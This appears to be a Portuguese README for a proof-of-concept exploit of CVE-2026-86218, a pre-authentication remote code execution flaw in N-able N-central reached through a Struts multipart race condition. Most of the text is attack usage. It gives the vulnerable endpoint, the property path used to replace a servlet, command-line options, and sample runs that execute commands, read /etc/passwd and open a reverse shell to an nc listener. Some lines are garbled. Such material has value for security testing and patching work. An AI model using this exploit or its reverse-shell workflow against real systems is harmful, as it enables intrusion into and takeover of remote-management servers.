
Prova de conceito em Python 3 para o CVE-2026-86218, um RCE pré-autenticação no N-able N-central através de uma condição de corrida multipart do Struts, com execução de comandos e suporte a reverse shell.
Este é um exploit proof-of-concept em Python 3 para CVE-2026-86218, uma vulnerabilidade crítica de execução remota de código pré-autenticação no N-able N-central.
Detalhes da Vulnerabilidade:
O N-able N-central utiliza um formulário Struts com escopo de sessão em uma ação não autenticada (/remoteControlAction.do). Duas requisições multipart concorrentes podem causar uma condição de corrida no manipulador multipart do formulário e expor a configuração ativa do Jetty à população de propriedades do Commons BeanUtils. Isso permite que um atacante:
/bin/sh -spip install requests
python3 CVE-2026-86218.py -t <target_url> [options]
| Opção | Descrição |
|---|---|
-t, --target | URL do N-central alvo (ex.: https://192.168.1.100) |
-c, --command | Comando único a executar |
-i, --interactive | Modo de comando interativo |
--lhost | IP do listener para reverse shell |
--lport | Porta do listener (padrão: 4444) |
--servlet | Servlet a substituir: LogRetrieval, FileTransfer, AutomationManagerDownloadServlet |
--check | Verificar se o alvo é vulnerável |
--no-verify-ssl | Desabilitar a verificação de certificado SSL |
--timeout | Timeout da requisição (padrão: 30s) |
--race-delay | Atraso da condição de corrida (padrão: 0.35s) |
-v, --verbose | Habilitar saída detalhada |
python3 CVE-2026-86218.py -t https://192.168.1.100 --check --no-verify-ssl
Saída Esperada:
[*] Checking target version at https://192.168.1.100
[+] N-central 2026.3.1.13 is vulnerable
python3 CVE-2026-86218.py -t https://192.168.1.100 -c "id" --no-verify-ssl
Saída Esperada:
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2026-86218 - N-able N-central Pre-Auth RCE Exploit ║
║ Version: 1.0.0 ║
║ CVSS: 10.0 (Critical) ║
╚══════════════════════════════════════════════════════════════════╝
[*] Checking target version at https://192.168.1.100
[+] N-central 2026.3.1.13 is vulnerable
[*] Obtaining unauthenticated session...
[*] Performing multipart race condition...
[*] Establishing connection for race condition...
[*] Sending helper request to install handler...
[*] Sending mutation fields...
[+] Race condition completed successfully
[*] Executing command: id
[+] Command executed successfully
uid=998(nable) gid=998(nable) groups=998(nable)
Inicie o listener primeiro:
nc -lvnp 4444
Execute o exploit:
python3 CVE-2026-86218.py -t https://192.168.1.100 --lhost 10.10.14.5 --lport 4444 --no-verify-ssl
Saída Esperada:
[*] Preparing reverse shell to 10.10.14.5:4444
[!] Starting reverse shell...
[!] Make sure to have a listener running: nc -lvnp 4444
[+] Reverse shell payload sent successfully!
[+] Check your listener for incoming connection
Saída do listener:
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [192.168.1.100] 49234
id
uid=998(nable) gid=998(nable) groups=998(nable)
python3 CVE-2026-86218.py -t https://192.168.1.100 -i --no-verify-ssl
Sessão Interativa:
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2026-86218 - N-able N-central Pre-Auth RCE Exploit ║
║ Version: 1.0.0 ║
║ CVSS: 10.0 (Critical) ║
╚══════════════════════════════════════════════════════════════════╝
[*] Checking target version at https://192.168.1.100
[+] N-central 2026.3.1.13 is vulnerable
[*] Obtaining unauthenticated session...
[*] Performing multipart race condition...
[+] Race condition completed successfully
[*] Entering interactive command mode
[*] Type 'exit' or 'quit' to leave
[*] Type 'shell' for reverse shell setup
ncentral> id
uid=998(nable) gid=998(nable) groups=998(nable)
ncentral> cat /etc/passwd | head -5
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...
ncentral> shell
Listener IP: 10.10.14.5
Listener Port: 4444
[*] Preparing reverse shell to 10.10.14.5:4444
[+] Reverse shell payload sent successfully!
ncentral> exit
# Use FileTransfer servlet (more disruptive)
python3 CVE-2026-86218.py -t https://192.168.1.100 -c "id" --servlet FileTransfer --no-verify-ssl
| Servlet | Descrição | Impacto |
|---|---|---|
LogRetrieval | Endpoint de recuperação de logs (padrão) | Menos disruptivo, logs indisponíveis até reiniciar |
FileTransfer | Endpoint de transferência de arquivos | Interrompe a funcionalidade de transferência de arquivos |
AutomationManagerDownloadServlet | Download do gerenciador de automação | Requer porta da interface de gerenciamento (8443) |
/remoteControlAction.do para extrair a versão da página de erroA vulnerabilidade explora uma condição de corrida no tratamento de formulários multipart do Struts:
Os campos de mutação usam caminhos de propriedades JavaBean:
multipartRequestHandler.servlet.servletContext.classLoader.context.servletHandler.servlet(LogRetrieval).heldClass
Isso percorre: manipulador multipart → contexto do servlet → classloader → WebAppContext → manipulador de servlet → detentor específico
/remoteControlAction.doEste exploit é fornecido apenas para testes de segurança autorizados e fins educacionais. O uso não autorizado deste exploit contra sistemas que você não possui ou não tem permissão para testar é ilegal e antiético.
Sempre obtenha autorização adequada antes de realizar atividades de teste de penetração.